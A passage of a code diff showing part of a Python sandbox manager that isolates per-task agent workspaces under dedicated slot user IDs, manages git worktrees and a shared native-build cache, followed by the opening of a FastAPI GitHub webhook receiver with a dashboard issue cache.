return slot_uid is not None and platform.system() == "Linux" and os.geteuid() == 0
|
||||
|
||||
|
||||
def _slot_pids(slot_uid: int, proc_root: Path = Path("/proc")) -> tuple[int, ...]:
|
||||
"""Return non-zombie process ids owned by the slot UID.
|
||||
|
||||
Debian's slim image does not include procps/pkill. Reading `/proc` keeps
|
||||
slot cleanup self-contained and avoids adding a runtime package only for
|
||||
this one operation.
|
||||
"""
|
||||
try:
|
||||
entries = tuple(proc_root.iterdir())
|
||||
except OSError as exc:
|
||||
log.warning("failed to scan %s for slot user %s: %s", proc_root, slot_uid, exc)
|
||||
return ()
|
||||
|
||||
pids: list[int] = []
|
||||
for entry in entries:
|
||||
if not entry.name.isdecimal():
|
||||
continue
|
||||
try:
|
||||
status = (entry / "status").read_text(encoding="utf-8")
|
||||
except OSError:
|
||||
# The process may have exited between `iterdir` and `read_text`.
|
||||
continue
|
||||
|
||||
state = ""
|
||||
uids: tuple[int, ...] = ()
|
||||
for line in status.splitlines():
|
||||
if line.startswith("State:"):
|
||||
parts = line.split(maxsplit=1)
|
||||
state = parts[1] if len(parts) == 2 else ""
|
||||
elif line.startswith("Uid:"):
|
||||
try:
|
||||
uids = tuple(int(part) for part in line.split()[1:5])
|
||||
except ValueError:
|
||||
uids = ()
|
||||
|
||||
if state.startswith("Z"):
|
||||
continue
|
||||
if slot_uid in uids:
|
||||
pids.append(int(entry.name))
|
||||
return tuple(pids)
|
||||
|
||||
|
||||
def _reap_slot(slot_uid: int | None) -> None:
|
||||
"""Kill any processes still running as a slot UID.
|
||||
|
||||
Slot UIDs are reused. A previous task's straggler process must not survive
|
||||
long enough to observe or interfere with the next task assigned to that UID.
|
||||
"""
|
||||
if not _slot_permissions_active(slot_uid):
|
||||
return
|
||||
assert slot_uid is not None
|
||||
for pid in _slot_pids(slot_uid):
|
||||
try:
|
||||
os.kill(pid, signal.SIGKILL)
|
||||
except ProcessLookupError:
|
||||
continue
|
||||
except OSError as exc:
|
||||
log.warning("failed to kill slot user %s process %s: %s", slot_uid, pid, exc)
|
||||
|
||||
|
||||
def _prepare_slot_tmpdir(workspace: Workspace, slot_uid: int | None) -> Path:
|
||||
"""Return the per-workspace tmpdir path, idempotently provisioning it.
|
||||
|
||||
Ownership/mode is set by ``_chown_workspace`` as part of the workspace's
|
||||
single-ownership invariant; this helper only:
|
||||
|
||||
- replaces any non-directory at ``.omp-tmp`` (symlink-protection: a user
|
||||
who plants a symlink there could redirect later writes outside the
|
||||
workspace regardless of who owns the destination), and
|
||||
- ``mkdir(mode=0o700, exist_ok=True)`` as a safety net for callers that
|
||||
run before ``ensure_workspace`` (e.g. unit tests with ``slot_uid=None``).
|
||||
"""
|
||||
del slot_uid # ownership is _chown_workspace's job; kept for call-site parity
|
||||
tmpdir = workspace.root / ".omp-tmp"
|
||||
try:
|
||||
st = tmpdir.lstat()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
else:
|
||||
if not stat.S_ISDIR(st.st_mode):
|
||||
tmpdir.unlink()
|
||||
tmpdir.mkdir(mode=0o700, parents=True, exist_ok=True)
|
||||
return tmpdir
|
||||
|
||||
|
||||
def _slot_subprocess_kwargs(slot_uid: int | None) -> dict[str, Any]:
|
||||
"""Return subprocess identity kwargs for commands that should run as a slot.
|
||||
|
||||
`preexec_fn` is intentionally avoided: the worker runs tasks in threads,
|
||||
and `subprocess` warns that `preexec_fn` is unsafe in multithreaded
|
||||
parents. Python's native `user` / `group` / `extra_groups` parameters do
|
||||
the setuid/setgid work in the child safely.
|
||||
"""
|
||||
if not _slot_permissions_active(slot_uid):
|
||||
return {}
|
||||
assert slot_uid is not None
|
||||
return {"user": slot_uid, "group": slot_uid, "extra_groups": [_SHARED_OMP_GID], "umask": 0o002}
|
||||
|
||||
|
||||
def _prepare_slot_runtime_env(workspace: Workspace, slot_uid: int | None) -> dict[str, str]:
|
||||
"""Compute the env overlay (TMPDIR + XDG_*) for slot-side subprocesses.
|
||||
|
||||
Pure env helper: ownership of the workspace tree (including these XDG
|
||||
paths and the bun install cache) is the single responsibility of
|
||||
``ensure_workspace``/``_chown_workspace``. The mkdir calls here exist
|
||||
only as a safety net for callers that bypass ``ensure_workspace`` (unit
|
||||
tests) or for the case where a runtime dir was deleted mid-process.
|
||||
|
||||
Cargo/rustup/target caches live under ``/data/cache/*`` (container ENV)
|
||||
and are group-shared via ``omp``. Bun's install cache is explicitly
|
||||
workspace-private because bun chmod/chowns its cache root, which makes a
|
||||
cross-slot shared cache a permanent source of permission failures.
|
||||
"""
|
||||
tmpdir = _prepare_slot_tmpdir(workspace, slot_uid)
|
||||
xdg_root = workspace.root / ".omp-xdg"
|
||||
xdg_data = xdg_root / "data"
|
||||
xdg_state = xdg_root / "state"
|
||||
xdg_cache = xdg_root / "cache"
|
||||
bun_cache = xdg_cache / "bun-install"
|
||||
|
||||
for base in (xdg_data, xdg_state, xdg_cache):
|
||||
base.mkdir(parents=True, exist_ok=True)
|
||||
(base / "omp").mkdir(parents=True, exist_ok=True)
|
||||
bun_cache.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
return {
|
||||
"TMPDIR": str(tmpdir),
|
||||
"TMP": str(tmpdir),
|
||||
"TEMP": str(tmpdir),
|
||||
"XDG_DATA_HOME": str(xdg_data),
|
||||
"XDG_STATE_HOME": str(xdg_state),
|
||||
"XDG_CACHE_HOME": str(xdg_cache),
|
||||
"BUN_INSTALL_CACHE_DIR": str(bun_cache),
|
||||
}
|
||||
|
||||
|
||||
def _provision_runtime_dirs(ws_root: Path) -> None:
|
||||
"""Create the runtime dirs that ``_chown_workspace`` will hand to the slot.
|
||||
|
||||
Runs immediately before ``_chown_workspace`` so the recursive chown sweep
|
||||
picks up ``.omp-tmp`` and the per-workspace XDG tree. Without this,
|
||||
``_prepare_slot_runtime_env`` would create them later from the orchestrator
|
||||
process — leaving root-owned cache roots that bun/biome/cargo cannot
|
||||
chmod/utime, the original source of the recurring permission failures.
|
||||
|
||||
Symlink-safe on ``.omp-tmp`` (replaces a planted non-directory in place).
|
||||
"""
|
||||
tmpdir = ws_root / ".omp-tmp"
|
||||
try:
|
||||
st = tmpdir.lstat()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
else:
|
||||
if not stat.S_ISDIR(st.st_mode):
|
||||
tmpdir.unlink()
|
||||
tmpdir.mkdir(mode=0o700, parents=True, exist_ok=True)
|
||||
|
||||
xdg_root = ws_root / ".omp-xdg"
|
||||
for sub in ("data", "state", "cache"):
|
||||
base = xdg_root / sub
|
||||
base.mkdir(parents=True, exist_ok=True)
|
||||
(base / "omp").mkdir(parents=True, exist_ok=True)
|
||||
(xdg_root / "cache" / "bun-install").mkdir(parents=True, exist_ok=True)
|
||||
|
||||
|
||||
def _grant_group_bits(path: Path, *, gid: int, bits: int) -> None:
|
||||
try:
|
||||
st = path.lstat()
|
||||
except FileNotFoundError:
|
||||
return
|
||||
if stat.S_ISLNK(st.st_mode):
|
||||
return
|
||||
os.chown(path, -1, gid)
|
||||
path.chmod(stat.S_IMODE(st.st_mode) | bits)
|
||||
|
||||
|
||||
def _grant_tree(path: Path, *, gid: int, files_group_writable: bool) -> None:
|
||||
if not path.exists():
|
||||
return
|
||||
if path.is_file():
|
||||
bits = stat.S_IRGRP | (stat.S_IWGRP if files_group_writable else 0)
|
||||
_grant_group_bits(path, gid=gid, bits=bits)
|
||||
return
|
||||
for root, dirs, files in os.walk(path, followlinks=False):
|
||||
root_path = Path(root)
|
||||
_grant_group_bits(root_path, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID)
|
||||
for dirname in dirs:
|
||||
_grant_group_bits(root_path / dirname, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID)
|
||||
file_bits = stat.S_IRGRP | (stat.S_IWGRP if files_group_writable else 0)
|
||||
for filename in files:
|
||||
_grant_group_bits(root_path / filename, gid=gid, bits=file_bits)
|
||||
|
||||
|
||||
def _resolve_worktree_git_dirs(repo_dir: Path) -> tuple[Path, Path] | None:
|
||||
marker = repo_dir / ".git"
|
||||
if marker.is_dir():
|
||||
return marker, marker
|
||||
try:
|
||||
text = marker.read_text(encoding="utf-8").strip()
|
||||
except OSError:
|
||||
return None
|
||||
prefix = "gitdir:"
|
||||
if not text.startswith(prefix):
|
||||
return None
|
||||
raw_git_dir = text[len(prefix) :].strip()
|
||||
git_dir = Path(raw_git_dir)
|
||||
if not git_dir.is_absolute():
|
||||
git_dir = (repo_dir / git_dir).resolve()
|
||||
try:
|
||||
raw_common_dir = (git_dir / "commondir").read_text(encoding="utf-8").strip()
|
||||
except OSError:
|
||||
return git_dir, git_dir
|
||||
common_dir = Path(raw_common_dir)
|
||||
if not common_dir.is_absolute():
|
||||
common_dir = (git_dir / common_dir).resolve()
|
||||
return git_dir, common_dir
|
||||
|
||||
|
||||
def _share_git_metadata_with_slots(repo_dir: Path, slot_uid: int | None) -> None:
|
||||
"""Keep shared Git metadata writable by whichever slot gets the retry.
|
||||
|
||||
The worktree checkout itself is slot-private, but `.git` in a Git worktree
|
||||
points back into the shared clone pool. A retry may run as a different
|
||||
`omp-N` user, so the pool-side worktree gitdir, refs, reflogs, and object
|
||||
directories must stay writable through the shared `omp` group.
|
||||
"""
|
||||
if not _slot_permissions_active(slot_uid):
|
||||
return
|
||||
dirs = _resolve_worktree_git_dirs(repo_dir)
|
||||
if dirs is None:
|
||||
return
|
||||
git_dir, common_dir = dirs
|
||||
gid = _SHARED_OMP_GID
|
||||
_grant_tree(git_dir, gid=gid, files_group_writable=True)
|
||||
_grant_group_bits(common_dir, gid=gid, bits=stat.S_IRWXG | stat.S_ISGID)
|
||||
for rel, files_group_writable in (
|
||||
("objects", False),
|
||||
("refs", True),
|
||||
("logs", True),
|
||||
("worktrees", True),
|
||||
):
|
||||
_grant_tree(common_dir / rel, gid=gid, files_group_writable=files_group_writable)
|
||||
for rel in ("config", "packed-refs", "HEAD", "FETCH_HEAD", "ORIG_HEAD"):
|
||||
_grant_tree(common_dir / rel, gid=gid, files_group_writable=True)
|
||||
|
||||
|
||||
def _chown_workspace(ws_root: Path, slot_uid: int | None) -> None:
|
||||
"""Hand the entire workspace tree to the active slot UID/GID.
|
||||
|
||||
Single-ownership invariant: every file under ``ws_root`` ends up owned by
|
||||
``slot_uid:slot_uid`` with mode ``u=rwX,g=rwX,o=`` (``0770`` dirs / ``0660``
|
||||
files). The slot's GID is its own private gid (created by entrypoint.sh),
|
||||
so the group bits are functionally identical to owner-only — they exist
|
||||
for parity with the existing pattern and to make accidental future
|
||||
``setgid`` use safe.
|
||||
|
||||
The orchestrator (root) keeps read/write access via uid-0 bypass; any
|
||||
subprocess that touches paths the agent will revisit MUST drop to the slot
|
||||
via ``_slot_subprocess_kwargs`` so tools like bun/biome/cargo (which
|
||||
chmod/utime their own cache state) never encounter a non-owner file.
|
||||
|
||||
Self-healing on re-entry: an existing workspace left over from the old
|
||||
``root:slot`` model gets re-chown'd on the next ``ensure_workspace`` call.
|
||||
"""
|
||||
if slot_uid is None:
|
||||
return
|
||||
if platform.system() != "Linux":
|
||||
return
|
||||
if os.geteuid() != 0:
|
||||
return
|
||||
subprocess.run(["chown", "-R", f"{slot_uid}:{slot_uid}", str(ws_root)], check=True)
|
||||
subprocess.run(["chmod", "-R", "u=rwX,g=rwX,o=", str(ws_root)], check=True)
|
||||
|
||||
|
||||
# ---------- SandboxManager ----------
|
||||
|
||||
|
||||
class SandboxManager:
|
||||
"""Manages a shared clone pool and per-issue worktrees.
|
||||
|
||||
Remote-facing git operations are delegated to a `GitTransport`; the rest
|
||||
(worktree add/remove, identity config, directory layout) is purely local.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
root: Path,
|
||||
*,
|
||||
transport: GitTransport | None = None,
|
||||
natives_cache: NativesCache | None = None,
|
||||
) -> None:
|
||||
self.root = root
|
||||
self.pool = root / "_pool"
|
||||
self.transport: GitTransport = transport or LocalGitTransport(token=None)
|
||||
self.natives_cache = natives_cache
|
||||
root.mkdir(parents=True, exist_ok=True)
|
||||
self.pool.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# ---- pool ----
|
||||
def pool_path(self, repo: str) -> Path:
|
||||
return self.pool / repo.replace("/", "__")
|
||||
|
||||
def ensure_clone(self, *, repo: str, clone_url: str, default_branch: str) -> Path:
|
||||
"""Idempotent shared clone for `repo`.
|
||||
|
||||
`clone_url` MUST be a plain `https://github.com/<owner>/<repo>.git`
|
||||
(no embedded credentials). Auth is supplied per-call by the transport.
|
||||
"""
|
||||
target = self.pool_path(repo)
|
||||
if (target / ".git").exists() or (target / "HEAD").exists():
|
||||
# Idempotent refresh. An older deploy may have baked a
|
||||
# credentialed `https://user:pass@github.com/...` into
|
||||
# `.git/config`; rewrite to the credential-free URL we now own
|
||||
# before fetching so the PAT never persists on disk.
|
||||
self._reset_origin_url(target, clone_url)
|
||||
self.transport.fetch_pool(repo=repo, pool_dir=target)
|
||||
return target
|
||||
target.mkdir(parents=True, exist_ok=True)
|
||||
self.transport.clone_pool(
|
||||
repo=repo,
|
||||
clone_url=clone_url,
|
||||
default_branch=default_branch,
|
||||
target=target,
|
||||
)
|
||||
return target
|
||||
|
||||
@staticmethod
|
||||
def _reset_origin_url(repo_dir: Path, clone_url: str) -> None:
|
||||
"""`git remote set-url origin <clone_url>` if origin exists and differs.
|
||||
|
||||
Best-effort: silent no-op on failure (probe `get-url` first so we don't
|
||||
spam logs on first-time clones where origin isn't configured yet).
|
||||
"""
|
||||
probe = _safe_run(["git", "remote", "get-url", "origin"], cwd=repo_dir)
|
||||
if probe.returncode != 0:
|
||||
return
|
||||
if probe.stdout.strip() == clone_url:
|
||||
return
|
||||
_safe_run(["git", "remote", "set-url", "origin", clone_url], cwd=repo_dir)
|
||||
|
||||
# ---- per-issue workspace ----
|
||||
def workspace_root(self, repo: str, number: int) -> Path:
|
||||
return self.root / workspace_key(repo, number)
|
||||
|
||||
def ensure_workspace(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
number: int,
|
||||
title: str,
|
||||
clone_url: str,
|
||||
default_branch: str,
|
||||
existing_branch: str | None = None,
|
||||
author_name: str,
|
||||
author_email: str,
|
||||
slot_uid: int | None = None,
|
||||
) -> Workspace:
|
||||
"""Create or resume a per-issue worktree."""
|
||||
pool = self.ensure_clone(repo=repo, clone_url=clone_url, default_branch=default_branch)
|
||||
ws_root = self.workspace_root(repo, number)
|
||||
repo_dir = ws_root / "repo"
|
||||
session_dir = ws_root / ".omp-session"
|
||||
context_dir = ws_root / "context"
|
||||
artifacts_dir = ws_root / "artifacts"
|
||||
for path in (ws_root, session_dir, context_dir, context_dir / "repro", artifacts_dir):
|
||||
path.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
branch = existing_branch or make_branch(
|
||||
issue_number=number,
|
||||
title=title,
|
||||
seed=f"{repo}#{number}",
|
||||
)
|
||||
|
||||
repo_exists = (repo_dir / ".git").exists()
|
||||
workspace_prepared = False
|
||||
slot_git_kwargs = _slot_subprocess_kwargs(slot_uid)
|
||||
slot_git_env: dict[str, str] | None = None
|
||||
if repo_exists:
|
||||
# Existing workspaces are already slot-owned from the previous run.
|
||||
# Refresh pool-side group bits, then hand the tree to the current
|
||||
# slot before running any git command inside the worktree; root's
|
||||
# uid-0 bypass does not bypass git's safe.directory ownership check.
|
||||
_share_git_metadata_with_slots(repo_dir, slot_uid)
|
||||
_provision_runtime_dirs(ws_root)
|
||||
_chown_workspace(ws_root, slot_uid)
|
||||
workspace_prepared = True
|
||||
if not repo_exists:
|
||||
# Make sure the requested start point exists locally (best-effort).
|
||||
# For follow-ups on an existing PR, `existing_branch` is the remote
|
||||
# head branch we need to amend; starting from default would silently
|
||||
# lose the PR's current commits if the local pool branch is absent.
|
||||
self.transport.fetch_base_ref(repo=repo, pool_dir=pool, ref=existing_branch or default_branch)
|
||||
check = _safe_run(["git", "rev-parse", "--verify", f"refs/heads/{branch}"], cwd=pool)
|
||||
if check.returncode == 0:
|
||||
_run(["git", "worktree", "add", str(repo_dir), branch], cwd=pool)
|
||||
else:
|
||||
start_point = f"origin/{default_branch}"
|
||||
if existing_branch:
|
||||
remote = _safe_run(
|
||||
["git", "rev-parse", "--verify", f"refs/remotes/origin/{existing_branch}"],
|
||||
cwd=pool,
|
||||
)
|
||||
if remote.returncode == 0:
|
||||
start_point = f"origin/{existing_branch}"
|
||||
_run(
|
||||
[
|
||||
"git",
|
||||
"worktree",
|
||||
"add",
|
||||
"-b",
|
||||
branch,
|
||||
str(repo_dir),
|
||||
start_point,
|
||||
],
|
||||
cwd=pool,
|
||||
)
|
||||
else:
|
||||
slot_git_env = _git_env_for_repo(repo_dir)
|
||||
current = _safe_run(
|
||||
["git", "symbolic-ref", "--quiet", "--short", "HEAD"],
|
||||
cwd=repo_dir,
|
||||
env=slot_git_env,
|
||||
**slot_git_kwargs,
|
||||
)
|
||||
if current.returncode == 0 and current.stdout.strip():
|
||||
branch = current.stdout.strip()
|
||||
if existing_branch is not None and existing_branch != branch:
|
||||
log.warning(
|
||||
"workspace branch mapping %r differs from checked-out branch %r; using checkout",
|
||||
existing_branch,
|
||||
branch,
|
||||
)
|
||||
if not workspace_prepared:
|
||||
_share_git_metadata_with_slots(repo_dir, slot_uid)
|
||||
_provision_runtime_dirs(ws_root)
|
||||
_chown_workspace(ws_root, slot_uid)
|
||||
if slot_git_env is None:
|
||||
slot_git_env = _git_env_for_repo(repo_dir)
|
||||
# Identity is set on the worktree's shared config; idempotent. Run as
|
||||
# the slot after the chown so git never trips over safe.directory.
|
||||
for command in (["git", "config", "user.email", author_email], ["git", "config", "user.name", author_name]):
|
||||
proc = _safe_run(command, cwd=repo_dir, env=slot_git_env, **slot_git_kwargs)
|
||||
if proc.returncode != 0:
|
||||
raise GitCommandError(command, proc.returncode, proc.stdout, proc.stderr)
|
||||
_share_git_metadata_with_slots(repo_dir, slot_uid)
|
||||
workspace = Workspace(
|
||||
root=ws_root,
|
||||
repo_dir=repo_dir,
|
||||
session_dir=session_dir,
|
||||
context_dir=context_dir,
|
||||
artifacts_dir=artifacts_dir,
|
||||
branch=branch,
|
||||
repo_full_name=repo,
|
||||
issue_number=number,
|
||||
)
|
||||
# Best-effort: hardlink pre-built natives in if we've cached this
|
||||
# source state before. Runs AFTER the slot chown so the cache inode
|
||||
# keeps its `root:omp` ownership (the slot reads through group `omp`);
|
||||
# write-temp + rename in the napi build replaces with a new inode if
|
||||
# the agent rebuilds, so the cached file is never mutated.
|
||||
self._populate_natives_cache(workspace, slot_uid=slot_uid)
|
||||
return workspace
|
||||
|
||||
def _populate_natives_cache(self, workspace: Workspace, *, slot_uid: int | None = None) -> None:
|
||||
"""Try to hardlink cached pi-natives artifacts into the worktree.
|
||||
|
||||
Best-effort: any failure (no cache configured, non-git worktree,
|
||||
cache miss, link error) is logged at debug and swallowed. The agent
|
||||
falls back to a fresh napi build, exactly as it would without the
|
||||
cache.
|
||||
|
||||
Post-populate, the populated `packages/natives/native/` directory
|
||||
and the COPIED companion files are chowned to the slot so the slot
|
||||
can rebuild via temp + rename in that directory. The hardlinked
|
||||
`.node` files are LEFT at `root:omp` ownership — chowning them
|
||||
would chown the cache file too (shared inode), breaking the
|
||||
cross-slot sharing model. The slot reads them via group `omp`.
|
||||
"""
|
||||
cache = self.natives_cache
|
||||
if cache is None:
|
||||
return
|
||||
native_dir = workspace.repo_dir / "packages" / "natives" / "native"
|
||||
# NOTE: we deliberately do NOT require `native_dir.exists()` here. On
|
||||
# a cache miss `populate_workspace` returns None without creating any
|
||||
# directory; on a hit it mkdirs and copies in. That's the right
|
||||
# behavior — a hit by definition implies this repo's source state
|
||||
# produces natives, so creating the dir is correct.
|
||||
try:
|
||||
key = natives_compute_key(workspace.repo_dir)
|
||||
except (subprocess.CalledProcessError, RuntimeError, OSError) as exc:
|
||||
log.debug(
|
||||
"natives_cache key compute failed",
|
||||
extra={"workspace": workspace.workspace_key, "err": redact_credentials(str(exc))},
|
||||
)
|
||||
return
|
||||
try:
|
||||
hit = cache.populate_workspace(workspace.repo_full_name, key, native_dir)
|
||||
except OSError as exc:
|
||||
log.warning(
|
||||
"natives_cache populate failed",
|
||||
extra={"workspace": workspace.workspace_key, "key": key, "err": str(exc)},
|
||||
)
|
||||
return
|
||||
if hit is not None and _slot_permissions_active(slot_uid):
|
||||
assert slot_uid is not None
|
||||
self._chown_natives_for_slot(native_dir, hit, slot_uid=slot_uid)
|
||||
log.info(
|
||||
"natives_cache",
|
||||
extra={
|
||||
"action": "hit" if hit is not None else "miss",
|
||||
"workspace": workspace.workspace_key,
|
||||
"repo": workspace.repo_full_name,
|
||||
"key": key,
|
||||
"files": [str(p.name) for p in hit.files] if hit is not None else [],
|
||||
},
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _chown_natives_for_slot(native_dir: Path, hit: CacheHit, *, slot_uid: int) -> None:
|
||||
"""Hand the populated native dir to the slot WITHOUT touching the
|
||||
hardlinked `.node` inodes (those are shared with the cache).
|
||||
|
||||
Files whose names match a cached `.node` are skipped — they are
|
||||
hardlinks back into the root:omp cache and the slot reads them via
|
||||
group `omp`. Everything else (the directory itself, copied
|
||||
companions) is chowned to the slot so the slot can rebuild via
|
||||
temp + rename.
|
||||
"""
|
||||
try:
|
||||
os.chown(native_dir, slot_uid, slot_uid)
|
||||
except OSError as exc:
|
||||
log.warning("natives_cache chown dir failed", extra={"err": str(exc)})
|
||||
return
|
||||
node_basenames = {p.name for p in hit.files if p.name.endswith(".node")}
|
||||
for child in native_dir.iterdir():
|
||||
if child.name in node_basenames:
|
||||
continue # hardlink to cache — must not chown
|
||||
try:
|
||||
os.chown(child, slot_uid, slot_uid, follow_symlinks=False)
|
||||
except OSError as exc:
|
||||
log.warning(
|
||||
"natives_cache chown companion failed",
|
||||
extra={"file": str(child), "err": str(exc)},
|
||||
)
|
||||
|
||||
def remove_workspace(self, *, repo: str, number: int) -> None:
|
||||
ws_root = self.workspace_root(repo, number)
|
||||
repo_dir = ws_root / "repo"
|
||||
if repo_dir.exists():
|
||||
pool = self.pool_path(repo)
|
||||
_safe_run(["git", "worktree", "remove", "--force", str(repo_dir)], cwd=pool)
|
||||
if repo_dir.exists():
|
||||
shutil.rmtree(repo_dir, ignore_errors=True)
|
||||
if ws_root.exists():
|
||||
shutil.rmtree(ws_root, ignore_errors=True)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"GitCommandError",
|
||||
"GitTransport",
|
||||
"LocalGitTransport",
|
||||
"SandboxManager",
|
||||
"Workspace",
|
||||
"make_branch",
|
||||
"rename_workspace_branch",
|
||||
"validate_branch_slug",
|
||||
"redact_credentials",
|
||||
"workspace_key",
|
||||
]
|
||||
@@ -0,0 +1,790 @@
|
||||
"""FastAPI receiver for GitHub webhooks."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import time
|
||||
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
|
||||
from contextlib import asynccontextmanager
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
from fastapi import Body, FastAPI, Header, HTTPException, Request, status
|
||||
from fastapi.responses import HTMLResponse, JSONResponse
|
||||
from fastapi.staticfiles import StaticFiles
|
||||
|
||||
from robomp import github_events
|
||||
from robomp.autoclose import AutocloseScheduler
|
||||
from robomp.config import Settings, get_settings
|
||||
from robomp.dashboard import render_index, static_dir, tail_jsonl
|
||||
from robomp.db import (
|
||||
INACTIVE_EVENT_STATES,
|
||||
Database,
|
||||
get_database,
|
||||
iso_seconds_ago,
|
||||
)
|
||||
from robomp.db import (
|
||||
issue_key as make_issue_key,
|
||||
)
|
||||
from robomp.github_backend import GitHubBackend
|
||||
from robomp.github_client import GitHubError, IssueSummary
|
||||
from robomp.manual_triage import (
|
||||
InvalidIssueRef,
|
||||
ManualTriageConflict,
|
||||
ManualTriageError,
|
||||
enqueue_manual_triage,
|
||||
parse_issue_ref,
|
||||
)
|
||||
from robomp.natives_cache import NativesCache
|
||||
from robomp.proxy_client import GitHubProxyClient, ProxyGitTransport
|
||||
from robomp.queue import WorkerPool
|
||||
from robomp.sandbox import SandboxManager
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
@dataclass(slots=True)
|
||||
class _IssueBrowseCacheEntry:
|
||||
repos: tuple[str, ...]
|
||||
issues: list[IssueSummary]
|
||||
errors: list[dict[str, str]]
|
||||
fetched_at: float
|
||||
|
||||
|
||||
class _IssueBrowseCache:
|
||||
"""In-process cache for the dashboard's GitHub issue browser.
|
||||
|
||||
The browse panel is a convenience picker. It should not hit GitHub's
|
||||
`/issues` endpoint on every browser reload because that endpoint returns PRs
|
||||
mixed into the issue list. Webhooks keep warmed entries fresh; the dashboard
|
||||
Refresh button can still force a live pull when an operator wants one.
|
||||
"""
|
||||
|
||||
def __init__(self) -> None:
|
||||
self._entries: dict[tuple[str, int, tuple[str, ...]], _IssueBrowseCacheEntry] = {}
|
||||
self._lock = asyncio.Lock()
|
||||
|
||||
async def get_or_fetch(
|
||||
self,
|
||||
*,
|
||||
state: str,
|
||||
limit: int,
|
||||
repos: tuple[str, ...],
|
||||
force: bool,
|
||||
fetch: Callable[[], Awaitable[tuple[list[IssueSummary], list[dict[str, str]]]]],
|
||||
) -> tuple[_IssueBrowseCacheEntry, bool]:
|
||||
key = (state, limit, repos)
|
||||
async with self._lock:
|
||||
if not force and (entry := self._entries.get(key)) is not None:
|
||||
return entry, True
|
||||
|
||||
issues, errors = await fetch()
|
||||
issues.sort(key=lambda s: s.updated_at, reverse=True)
|
||||
entry = _IssueBrowseCacheEntry(
|
||||
repos=repos,
|
||||
issues=issues[:limit],
|
||||
errors=errors,
|
||||
fetched_at=time.time(),
|
||||
)
|
||||
async with self._lock:
|
||||
if not force and (current := self._entries.get(key)) is not None:
|
||||
return current, True
|
||||
self._entries[key] = entry
|
||||
return entry, False
|
||||
|
||||
async def apply_webhook(
|
||||
self,
|
||||
*,
|
||||
event_type: str,
|
||||
payload: Mapping[str, Any],
|
||||
allowlist: frozenset[str],
|
||||
) -> None:
|
||||
mutation = _issue_cache_mutation(event_type, payload, allowlist)
|
||||
if mutation is None:
|
||||
return
|
||||
repo, number, summary = mutation
|
||||
async with self._lock:
|
||||
for (state, limit, repos), entry in self._entries.items():
|
||||
if repo not in repos:
|
||||
continue
|
||||
entry.issues = [item for item in entry.issues if not (item.repo == repo and item.number == number)]
|
||||
if summary is not None and _cache_state_includes(state, summary.state):
|
||||
entry.issues.append(summary)
|
||||
entry.issues.sort(key=lambda s: s.updated_at, reverse=True)
|
||||
del entry.issues[limit:]
|
||||
|
||||
|
||||
def _cache_state_includes(cache_state: str, issue_state: str) -> bool:
|
||||
return cache_state == "all" or issue_state == cache_state
|
||||
|
||||
|
||||
def _repo_full_name(payload: Mapping[str, Any]) -> str | None:
|
||||
repo = payload.get("repository")
|
||||
if isinstance(repo, Mapping):
|
||||
full_name = repo.get("full_name")
|
||||
if isinstance(full_name, str) and full_name:
|
||||
return full_name
|
||||
return None
|
||||
|
||||
|
||||
def _label_names(raw: Any) -> tuple[str, ...]:
|
||||
if not isinstance(raw, (list, tuple)):
|
||||
return ()
|
||||
return tuple(str(label.get("name") or "") if isinstance(label, Mapping) else str(label) for label in raw)
|
||||
|
||||
|
||||
def _issue_summary_from_payload(repo: str, issue: Mapping[str, Any]) -> IssueSummary | None:
|
||||
number = issue.get("number")
|
||||
if not isinstance(number, int):
|
||||
return None
|
||||
user = issue.get("user")
|
||||
state = str(issue.get("state") or "open").lower()
|
||||
if state not in {"open", "closed"}:
|
||||
state = "open"
|
||||
comments = issue.get("comments")
|
||||
if not isinstance(comments, int):
|
||||
comments = 0
|
||||
return IssueSummary(
|
||||
repo=repo,
|
||||
number=number,
|
||||
title=str(issue.get("title") or ""),
|
||||
state=state,
|
||||
author=str(user.get("login") or "") if isinstance(user, Mapping) else "",
|
||||
labels=_label_names(issue.get("labels")),
|
||||
comments=comments,
|
||||
updated_at=str(issue.get("updated_at") or issue.get("created_at") or ""),
|
||||
created_at=str(issue.get("created_at") or ""),
|
||||
html_url=str(issue.get("html_url") or f"https://github.com/{repo}/issues/{number}"),
|
||||
)
|
||||
|
||||
|
||||
def _issue_cache_mutation(
|
||||
event_type: str,
|
||||
payload: Mapping[str, Any],
|
||||
allowlist: frozenset[str],
|
||||
) -> tuple[str, int, IssueSummary | None] | None:
|
||||
if event_type not in {"issues", "issue_comment"}:
|
||||
return None
|
||||
repo = _repo_full_name(payload)
|
||||
if repo is None or repo.lower() not in allowlist:
|
||||
return None
|
||||
issue = payload.get("issue")
|
||||
if not isinstance(issue, Mapping):
|
||||
return None
|
||||
number = issue.get("number")
|
||||
if not isinstance(number, int):
|
||||
return None
|
||||
if "pull_request" in issue:
|
||||
return repo, number, None
|
||||
if str(payload.get("action") or "") == "deleted":
|
||||
return repo, number, None
|
||||
summary = _issue_summary_from_payload(repo, issue)
|
||||
if summary is None:
|
||||
return None
|
||||
return repo, number, summary
|
||||
|
||||
|
||||
def _issue_browse_payload(
|
||||
*,
|
||||
entry: _IssueBrowseCacheEntry,
|
||||
cache_hit: bool,
|
||||
processed_keys: frozenset[str],
|
||||
) -> dict[str, Any]:
|
||||
return {
|
||||
"issues": [
|
||||
{
|
||||
"repo": s.repo,
|
||||
"number": s.number,
|
||||
"title": s.title,
|
||||
"state": s.state,
|
||||
"author": s.author,
|
||||
"labels": list(s.labels),
|
||||
"comments": s.comments,
|
||||
"updated_at": s.updated_at,
|
||||
"created_at": s.created_at,
|
||||
"html_url": s.html_url,
|
||||
"processed": make_issue_key(s.repo, s.number) in processed_keys,
|
||||
}
|
||||
for s in entry.issues
|
||||
],
|
||||
